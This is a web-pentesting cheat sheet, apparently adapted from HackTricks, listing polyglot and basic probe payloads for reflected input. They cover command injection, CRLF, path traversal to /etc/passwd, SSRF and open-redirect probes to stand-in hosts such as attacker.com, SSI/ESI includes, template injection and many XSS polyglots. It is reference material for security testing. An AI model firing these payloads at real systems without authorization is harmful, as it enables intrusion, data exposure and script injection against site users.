daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (11009B)


      1 ---
      2 title: "Reflecting Techniques - PoCs and Polygloths CheatSheet"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/pocs-and-polygloths-cheatsheet/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Reflecting Techniques - PoCs and Polygloths CheatSheet
     14 
     15 These PoCs and polyglots give testers a fast **summary** of vulnerabilities to check when **input is reflected in a response**. The collection draws on the linked HackTricks technique pages and established payload/testing collections.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup><sup>[[3]](#references)</sup>
     16 
     17 > [!WARNING]
     18 > This **cheat sheet is not a comprehensive test suite**. Follow the linked vulnerability page for prerequisites, context-specific payloads, and validation guidance.
     19 
     20 > [!CAUTION]
     21 > It omits `Content-Type`-dependent injections such as XXE and database-specific injections, because those tests depend heavily on the request format, backend technology, and query structure.
     22 
     23 ## Polyglots list <sup>[[1]](#references)</sup>
     24 
     25 ```python
     26 {{7*7}}[7*7]
     27 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
     28 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
     29 %0d%0aLocation:%20http://attacker.com
     30 %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
     31 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
     32 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
     33 <br><b><h1>THIS IS AN INJECTED TITLE </h1>
     34 /etc/passwd
     35 ../../../../../../etc/hosts
     36 ..\..\..\..\..\..\etc/hosts
     37 /etc/hostname
     38 ../../../../../../etc/hosts
     39 C:/windows/system32/drivers/etc/hosts
     40 ../../../../../../windows/system32/drivers/etc/hosts
     41 ..\..\..\..\..\..\windows/system32/drivers/etc/hosts
     42 http://asdasdasdasd.burpcollab.com/mal.php
     43 \\asdasdasdasd.burpcollab.com/mal.php
     44 www.whitelisted.com
     45 www.whitelisted.com.evil.com
     46 https://google.com
     47 //google.com
     48 javascript:alert(1)
     49 (\\w*)+$
     50 ([a-zA-Z]+)*$
     51 ((a+)+)+$
     52 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
     53 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
     54 <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
     55 " onclick=alert() a="
     56 '"><img src=x onerror=alert(1) />
     57 javascript:alert()
     58 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
     59 -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
     60 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src//README.md"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
     61 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
     62 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
     63 ```
     64 
     65 ## [Client Side Template Injection](/hacktricks/pentesting-web/client-side-template-injection-csti)
     66 
     67 ### Basic Tests
     68 
     69 ```text
     70 {{7*7}}
     71 [7*7]
     72 ```
     73 
     74 ### Polygloths
     75 
     76 ```bash
     77 {{7*7}}[7*7]
     78 ```
     79 
     80 ## [Command Injection](/hacktricks/pentesting-web/command-injection)
     81 
     82 ### Basic Tests
     83 
     84 ```bash
     85 ;ls
     86 ||ls;
     87 |ls;
     88 &&ls;
     89 &ls;
     90 %0Als
     91 `ls`
     92 $(ls)
     93 ```
     94 
     95 ### Polygloths
     96 
     97 ```bash
     98 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
     99 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
    100 ```
    101 
    102 ## [CRLF](/hacktricks/pentesting-web/crlf-0d-0a)
    103 
    104 ### Basic Tests
    105 
    106 ```bash
    107 %0d%0aLocation:%20http://attacker.com
    108 %3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
    109 %3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
    110 %0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
    111 ```
    112 
    113 ## Dangling Markup
    114 
    115 ### Basic Tests
    116 
    117 ```html
    118 <br><b><h1>THIS IS AND INJECTED TITLE </h1>
    119 ```
    120 
    121 ## [File Inclusion/Path Traversal](../file-inclusion/index.html)
    122 
    123 ### Basic Tests
    124 
    125 ```bash
    126 /etc/passwd
    127 ../../../../../../etc/hosts
    128 ..\..\..\..\..\..\etc/hosts
    129 /etc/hostname
    130 ../../../../../../etc/hosts
    131 C:/windows/system32/drivers/etc/hosts
    132 ../../../../../../windows/system32/drivers/etc/hosts
    133 ..\..\..\..\..\..\windows/system32/drivers/etc/hosts
    134 http://asdasdasdasd.burpcollab.com/mal.php
    135 \\asdasdasdasd.burpcollab.com/mal.php
    136 ```
    137 
    138 ## [Open Redirect](/hacktricks/pentesting-web/open-redirect) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/index.html)
    139 
    140 ### Basic Tests
    141 
    142 ```bash
    143 www.whitelisted.com
    144 www.whitelisted.com.evil.com
    145 https://google.com
    146 //google.com
    147 javascript:alert(1)
    148 ```
    149 
    150 ## [ReDoS](/hacktricks/pentesting-web/regular-expression-denial-of-service-redos)
    151 
    152 ### Basic Tests
    153 
    154 ```bash
    155 (\\w*)+$
    156 ([a-zA-Z]+)*$
    157 ((a+)+)+$
    158 ```
    159 
    160 ## [Server Side Inclusion/Edge Side Inclusion](/hacktricks/pentesting-web/server-side-inclusion-edge-side-inclusion-injection)
    161 
    162 ### Basic Tests
    163 
    164 ```html
    165 <!--#echo var="DATE_LOCAL" -->
    166 <!--#exec cmd="ls" -->
    167 <esi:include src=http://attacker.com/>
    168 x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
    169 ```
    170 
    171 ### Polygloths
    172 
    173 ```html
    174 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
    175 ```
    176 
    177 ## [Server Side Request Forgery](../ssrf-server-side-request-forgery/index.html)
    178 
    179 The same tests used for Open Redirect can be used here.
    180 
    181 ## [Server Side Template Injection](../ssti-server-side-template-injection/index.html)
    182 
    183 ### Basic Tests
    184 
    185 ```html
    186 ${{<%[%'"}}%\
    187 {{7*7}}
    188 ${7*7}
    189 <%= 7*7 %>
    190 ${{7*7}}
    191 #{7*7}
    192 ```
    193 
    194 ### Polygloths
    195 
    196 ```python
    197 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
    198 ```
    199 
    200 ## [XSLT Server Side Injection](/hacktricks/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations)
    201 
    202 ### Basic Tests
    203 
    204 ```html
    205 <xsl:value-of select="system-property('xsl:version')" />
    206 <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
    207 ```
    208 
    209 ### Polygloths
    210 
    211 ```html
    212 <xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
    213 ```
    214 
    215 ## XSS
    216 
    217 ### Basic Tests
    218 
    219 ```html
    220 " onclick=alert() a="
    221 '"><img src=x onerror=alert(1) />
    222 javascript:alert()
    223 ```
    224 
    225 ### Polygloths
    226 
    227 ```html
    228 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
    229 -->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
    230 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
    231 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src//README.md"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
    232 " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
    233 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
    234 javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
    235 javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
    236 javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
    237 javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
    238 javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
    239 javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
    240 javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
    241 --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
    242 /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
    243 javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
    244 /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
    245 -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
    246 <svg%0Ao%00nload=%09((pro\u006dpt))()//
    247 javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
    248 javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
    249 javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
    250 %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
    251 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
    252 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>
    253 ```
    254 
    255 ## References
    256 
    257 - [1] [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
    258 - [2] [PortSwigger Web Security Academy](https://portswigger.net/web-security/all-materials)
    259 - [3] [OWASP Web Security Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)